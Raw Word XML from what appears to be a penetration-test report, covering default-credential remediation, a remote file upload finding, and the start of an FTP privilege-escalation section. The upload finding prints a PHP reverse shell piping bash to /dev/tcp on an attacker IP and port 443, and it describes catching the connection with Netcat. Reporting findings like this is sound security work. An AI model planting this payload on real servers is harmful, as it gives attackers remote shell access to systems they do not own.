    </w:p>
    <w:p w14:paraId="76F6A2A8" w14:textId="0E1706A0" w:rsidR="00E645E6" w:rsidRDefault="0017027B" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2465D1B6" wp14:editId="182B6097">
            <wp:extent cx="6840220" cy="38474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6ECAFB64" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1B2EF9" w14:textId="532544D1" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CDD619" w14:textId="66B05426" w:rsidR="0017027B" w:rsidRDefault="0017027B" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0017027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>To mitigate the risk associated with default credentials, organizations should adopt a multi-faceted approach to bolster the security of their systems. Initially, it is imperative to change default credentials immediately after the installation or deployment of any system or application. This ensures that attackers cannot exploit the known default credentials to gain unauthorized access. Implementing robust password policies is equally crucial, emphasizing the use of strong, unique passwords to fortify user accounts. Regular credential rotation, where passwords are updated at scheduled intervals, further reduces the likelihood of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48426A0F" w14:textId="36EB8CD4" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05867085" w14:textId="11974715" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4C4639" w14:textId="59C9A6D9" w:rsidR="00E645E6" w:rsidRDefault="00670312" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0017027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote File upload</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1975"/>
        <w:gridCol w:w="8787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E645E6" w14:paraId="58942639" w14:textId="77777777" w:rsidTr="00E06298">
        <w:trPr>
          <w:trHeight w:val="1403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="282EC3DD" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRPr="002C17A9" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="251CAFE2" w14:textId="4E0D5BCC" w:rsidR="00E645E6" w:rsidRDefault="003D0B8C" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Remote File Upload is a vulnerability that affects web applications. In this vulnerability, attackers exploit the opportunity to upload files or scripts from remote systems to the web server. This vulnerability occurs when a web application fails to conduct proper security checks for file uploads, allowing attackers to upload and potentially execute malicious files on the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E645E6" w14:paraId="52C041F6" w14:textId="77777777" w:rsidTr="00E06298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="468B5098" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699FA2AB" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C3076F4" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A5039A4" w14:textId="1269DD63" w:rsidR="00E645E6" w:rsidRDefault="003D0B8C" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E645E6" w14:paraId="6E6BA366" w14:textId="77777777" w:rsidTr="00E06298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34AF5E19" w14:textId="5BC0090A" w:rsidR="00E645E6" w:rsidRDefault="0017027B" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> code</w:t>
            </w:r>
            <w:r w:rsidR="00E645E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B9B5DB" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63A6DAC8" w14:textId="77777777" w:rsidR="003D0B8C" w:rsidRPr="003D0B8C" w:rsidRDefault="003D0B8C" w:rsidP="003D0B8C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="13241EA6" w14:textId="77777777" w:rsidR="003D0B8C" w:rsidRPr="003D0B8C" w:rsidRDefault="003D0B8C" w:rsidP="003D0B8C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BB880AC" w14:textId="77777777" w:rsidR="003D0B8C" w:rsidRPr="003D0B8C" w:rsidRDefault="003D0B8C" w:rsidP="003D0B8C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>exec(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>"/bin/bash -c 'bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>/192.168.19.132/443 0&gt;&amp;1'");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D82650E" w14:textId="202D336F" w:rsidR="00E645E6" w:rsidRDefault="003D0B8C" w:rsidP="003D0B8C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0B8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32686DAD" w14:textId="011AE100" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F366EE6" w14:textId="336ADB50" w:rsidR="003D0B8C" w:rsidRDefault="003D0B8C" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Discovery Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178D9924" w14:textId="77777777" w:rsidR="00011366" w:rsidRDefault="00D86F6B" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86F6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">So, when I logged in, after some research, I noticed that there might be a file upload option in it, but it wasn't clear if it had a remote file upload vulnerability. So, I wrote a small PHP remote code and uploaded it. After that, I started a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86F6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86F6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> server on my machine and then executed the uploaded file through the URL. Consequently, I obtained a reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CA47F" w14:textId="5D3DFFB7" w:rsidR="00F33853" w:rsidRPr="00011366" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidenc</w:t>
      </w:r>
      <w:r w:rsidR="00011366">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00F33853">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF119D2" wp14:editId="0FE1D577">
            <wp:extent cx="6840220" cy="3373755"/>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0220" cy="3373755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ADB298" w14:textId="65C6F35F" w:rsidR="00D86F6B" w:rsidRDefault="00F33853" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5455A223" wp14:editId="75D9A5F4">
            <wp:extent cx="6840220" cy="3373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40220" cy="3373755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7365BF" w14:textId="7F489E4A" w:rsidR="00F33853" w:rsidRDefault="00F33853" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FED7512" wp14:editId="2AA3AD9F">
            <wp:extent cx="6528746" cy="249936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6536026" cy="2502147"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="379C45AE" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012A04A6" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4400FF04" w14:textId="28CD13B9" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A740D" w14:textId="4563EB5B" w:rsidR="00366DDB" w:rsidRPr="00366DDB" w:rsidRDefault="00366DDB" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00366DDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>To mitigate the risk of this vulnerability, web applications should implement rigorous validation checks for file uploads. This includes practices such as file type verification, size limits, and the proper utilization of access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA018F" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498D8ADD" w14:textId="5BE5EE65" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidR="007D00C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege escalation with FTP (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007D00C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GTFO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007D00C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> BINs)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1975"/>
